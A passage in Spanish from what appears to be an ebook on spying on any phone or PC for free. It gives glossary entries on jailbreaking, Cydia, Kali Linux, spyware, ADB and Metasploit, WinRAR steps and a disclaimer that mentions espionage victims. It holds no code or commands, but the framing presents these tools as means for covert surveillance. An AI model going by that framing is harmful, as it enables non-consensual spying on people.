en los Estados Unidos, aunque Apple anunció que la práctica puede violar la garantía.
Una de las principales razones para hacer jailbreak es para expandir las características impuestas
por Apple y su App Store. La mayoría de las herramientas instalan automáticamente Cydia, un
cliente nativo de APT para iOS usado para encontrar e instalar software para dispositivos con
jailbreak. Debido a que los programas disponibles a través de Cydia no requieren adherirse a los
manuales de estilo del App Store, muchos de ellos no son aplicaciones en sí, sino que son
extensiones y modificaciones para el sistema y otras aplicaciones. Los usuarios instalan tales
programas para distintos propósitos, como modificaciones de la interfaz, inclusión de
características y correcciones varias, y hacer el trabajo de desarrollo en el dispositivo más fácil al
proveer acceso al sistema de archivos y herramientas de línea de comandos.
El jailbreak no afecta a otras limitaciones impuestas como son la descarga de más de 50/100
megabytes de la Appstore sin conexión WiFi, la imposibilidad de sincronizar más de 5 dispositivos
iOS, o no poder compartir una dirección de pornografía por iMessage. Simplemente lo que
consigues con el jailbreak es quitar ciertas limitaciones, como por ejemplo instalar temas en el
dispositivo, o modificar la interfaz del mismo.
Algunos usuarios utilizan Cydia para expresar oposición a la censura que Apple aplica a contenidos
a través del proceso de aprobación de aplicaciones: a principios de2010, Apple expulsó una
aplicación hecha por Mark Fiore, ganador de un premio Pulitzer, porque "ponía en ridículo figuras
públicas", en violación de la sección 3.3.14 del contrato de licencia del programa de desarrollo para
iPhone. Más tarde Apple llamó a Fiore y le pidió presentar de nuevo su aplicación para aprobarla. A
finales de 2010, Apple bloqueó el uso de aplicaciones que permitían a usuarios donar dinero a
organizaciones sin fines de lucro y de caridad. Apple también expulsó una aplicación de WikiLeaks,
diciendo que violaba el contrato de desarrolladores.

Page | 104

iDroid:

El objetivo del Proyecto iDroid es ejecutar el kernel de Linux y el sistema operativo Android de
Google para los dispositivos de Apple. Con la utilización de nuestro gestor de arranque 'OpeniBoot',
hemos adquirido la capacidad de iniciar el kernel de Linux, por tanto, nos permite ejecutar Google
Android y cualquier otro sistema operativo basado en Linux con facilidad.

iDroid se distribuye ya sea como un paquete de descarga binario o utilizando la aplicación Bootlace
iOS, que permite instalar iDroid y OpeniBoot sin necesidad de un ordenador.
Con esto sí es posible ejecutar Android en dispositivos de la Apple.

 Kali Linux:

Kali Linux es una distribución de Linux avanzada para pruebas de penetración y auditorías de
seguridad.

Kali es una completa re-construcción de BackTrack Linux desde la base hacia arriba, y se adhiere
completamente a los estándares de desarrollo de Debian. Toda la nueva infraestructura ha sido
puesta en el lugar, todas las herramientas fueron revisadas y fueron embaladas.

 Spyware:

Spyware o programa espía es un software que recopila información de un ordenador y después


transmite esta información a una entidad externa sin el conocimiento o el consentimiento del
propietario del ordenador. El término spyware también se utiliza más ampliamente para referirse a
otros productos que no son estrictamente spyware. Estos productos, realizan diferentes funciones,
como mostrar anuncios no solicitados (pop-up), recopilar información privada, redirigir solicitudes
de páginas e instalar marcadores de teléfono. Lo cual puede ser muy peligroso.
Un spyware típico se auto-instala en el sistema afectado de forma que se ejecuta cada vez que se
pone en marcha el ordenador (utilizando CPU y memoria RAM, reduciendo la estabilidad del
ordenador), y funciona todo el tiempo, controlando el uso que se hace de Internet y mostrando
anuncios relacionados.

 iCloud:

iCloud es una base de datos que permite el almacenamiento y distribución de tus datos personales
entre tus dispositivos. Se asegura de que tengas siempre en todos la última versión de tus fotos,
documentos, apps, notas y demás información importante. Puedes usarlo para compartir tus fotos,
calendarios, ubicaciones y lo que quieras con tu familia en un pispás. Hasta te ayuda a encontrar tu

Page | 105

dispositivo si lo has perdido. Con iCloud todo funciona automáticamente. Sin
más.https://www.apple.com/es/icloud/

iTunes:
iTunes es un reproductor de medios y tienda de contenidos multimedia desarrollado por Apple con
el fin de reproducir, organizar y sincronizar iPods, iPhones, iPads y comprar música. Es compatible
con ordenadores basados en sistemas operativos Mac OS X, Windows 2000, Windows XP, Windows
Vista, Windows 7 y Windows 8.

https://www.apple.com/es/itunes/

 ADB:

Las siglas ADB significan Android Debug Bridge y se corresponden con una herramienta que nos
permite controlar el estado de nuestro smartphone Android. Así, por ejemplo, a través de ADB
podemos actualizar el sistema, ejecutar comandos shell, administrar el direccionamiento de puertos
o copiar arhivos.

Básicamente, en ADB encontramos una colección de herramientas y comandos útiles que nos
ayudarán a comunicar nuestro dispositivo directamente con el ordenador para, entre otros, acceder
al modo recovery. Por supuesto, para que esto sea posible necesitamos un cable y conectar el
smartphone vía USB con el ordenador.

http://www.androidpit.es/que-es-adb-comandos-mas-importantes

 Metasploit:

Metasploit es un proyecto open source de seguridad informática que proporciona información


acerca de vulnerabilidades de seguridad y ayuda en tests de penetración "Pentesting" y el
desarrollo de firmas para sistemas de detección de intrusos.
http://www.metasploit.com/

 WinRar:

WinRAR 5.0 es un programa para abrir, crear y descomprimir archivos RAR, ZIP y otros
formatos. Necesitamos descargarlo en caso de que tengamos archivos comprimidos. Siga estas
instrucciones para entender su uso básico.

Page | 106
Paso 1: Descargamos el WinRar de páginas confiables como Softonic.com

Paso 2: Seguimos los paso de instalación, muy fáciles, que se pueden seguir por instinto. Luego,
habiendo descargado el archivo comprimido, se verá como este.

Paso 3: Damos click derecho al archivo y nos aparecerá un menú, en ese menú podemos usar la
opción Extraer ficheros, la cual nos dará la opción de elegir en dónde queremos extraer los
archivos.

Page | 107
Paso 4: Seleccionamos dónde queremos que aparezca nuestro archivo extraído. Podemos elegir
preferiblemente que sea en el escritorio, pues de esa manera tenemos la facilidad de ver lo que
es, usarlo y luego organizarlo donde queramos. Pulsamos “Aceptar”.

Ya podemos ver en nuestro escritorio lo que se extrajo, está el archivo comprimido y el archivo que
salió de él, que es la carpeta que contiene los archivos que arrastraremos al FileZilla, para a su vez,
subirlo a nuestro dominio.

Recuerde que este conocimiento ha sido provisto solo por propósitos educaciones, no debería
usarse para propósitos delictivos. La víctima de espionaje tiene derecho a demandarle siempre y
cuando existan pruebas suficientes y si es ilegal en la región donde se practica. Este material no
debe ser utilizado con propósitos comerciales sin la autorización del autor. No nos hacemos
responsables si algo pudiera salir mal en el proceso de implementación de este material.

Espiar Cualquier Celular y PC Totalmente Gratis ©

Page | 108

Вам также может понравиться